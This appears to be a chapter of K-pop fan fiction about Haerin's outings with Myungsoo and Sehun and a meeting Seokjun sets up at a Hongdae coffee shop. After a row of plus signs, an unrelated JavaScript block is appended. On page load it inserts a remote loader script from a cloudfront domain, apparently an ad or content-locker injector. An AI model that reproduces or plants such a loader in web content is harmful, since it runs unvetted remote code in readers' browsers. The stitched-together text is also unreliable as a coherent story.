Chapter 25

The Presidential Son

Narrator’s POV

 

Days passed by, Seokjun would always be with Haerin. Haerin helped him with his “difficult” subjects. It annoyed the hell out of Kai and Sehun and most especially Myungsoo. Haerin couldn’t hang out with him and walk together with him to the building. And he just didn’t like the guy.

Myungsoo leaned on the grills and looked at the view. Then he felt someone poke his side.

“What are you doing here alone?” Haerin asked and faced him. Myungsoo glared at her.

“Where’s your tail?” He asked, not facing her. Haerin grinned and playfully plaed one arm around her shoulder.

“Sorry, I’ve been busy. Let’s eat out!” She beamed at him. Myungsoo shrugged her arm off, but his heart was palpitating already. Haerin grinned.

“Please? I’ll jump off the window without your help!” She suggested. Myungsoo’s lips twitched a little.

“Gangster-nim!”

Myungsoo spun around and playfully bopped her forehead.

“Arasso, arasso, agasshi.”

Haerin smiled as she went ahead of him. Myungsoo smiled at her direction.

 

“A motorcycle?” Haerin eyed the black Ducati in front of them. L nodded and handed her a helmet.

“Get in.” He said as he turned the machine on. Haerin hesitated for a while but she carefully slipped on top of the vehicle, Myungsoo grinned a little as he stepped on the gas. Haerin’s eyes widened and she held onto his waist tightly. Myungsoo smiled as they sped out of the campus.

 

Haerin stepped off the vehicle, she lightly pressed her cheeks. Myungsoo took the helmet from her hands.

“First time, agasshi?” He asked.

“Ani.” She shook her head, while trying to cover face.

“Let’s go, the usual place~”

“There’s a make-your-own ramen store!” She said.

 

Myungsoo’s POV

 

We stepped in the place, we were directed to a long table with different ingredients. Haerin smiled widely as she took in the aroma of the broth.

“That hungry?” I asked as I pulled her along the line.

“Yeah, eat a lot. My treat today, gangster-nim.” She smiled and tugged on my sleeve.

“Don’t you miss little Seokjun?” I asked.

“Ah, right, I’m supposed to meet him after this for his business math.”

I rolled my eyes.

“I tell you, that kid is in love with you.” I said. Haerin smiled and handed me a bowl.

“That would be cute.” She said and patted my hand.

“Do you want the~”

“Just be careful, Haerin-ah.” I chided. She nodded.

 

Narrator’s POV

 

“Sunbae, tomorrow…after class, can you meet me at Haru Coffee Shop at Hongdae?” Seokjun asked. Haerin nodded.

“Arasso, why?”

“I have something to tell you, sunbae, then I’ll see you tomorrow!” Seokjun ran to his class. Haerin looked around, while waiting for Sehun.

“That kid asked you out?” Kai appeared out of nowhere. Haerin looked up.

“How did you know?”

“He was practically jumping up and down with his friends, spreading the news, hon. Anyway, I have class, ask Sehun to walk you home.”

She nodded and waved him goodbye.

 

Sehun walked towards his best friend with his usual cold stare. Girls would give him appreciatively but of course, Sehun doesn’t notice.

“Oh, let’s go.” He said. Haerin looked at the girls eyeing them.

“Maybe walking alone is much more safer.” She grumbled, Sehun shrugged and just pulled her out the building by her bag.

“Where’s the kid?” He asked.

“He has class.” She nodded, she saw Sungjong and Hoya pass by, she gave them a wave.

Sehun rolled his eyes and placed one arm around her shoulder.

“Do you still know how to cook that red soup?” Sehun asked.

“Bean paste soup, Sehunie.” Haerin grinned.

“Good, ‘cause we’re going to the mart and buy ingredients, I already got sick of Kai hyung’s cooking.”

Haerin chuckled. Sehun stopped in front of his car. Haerin got in.

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++ if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};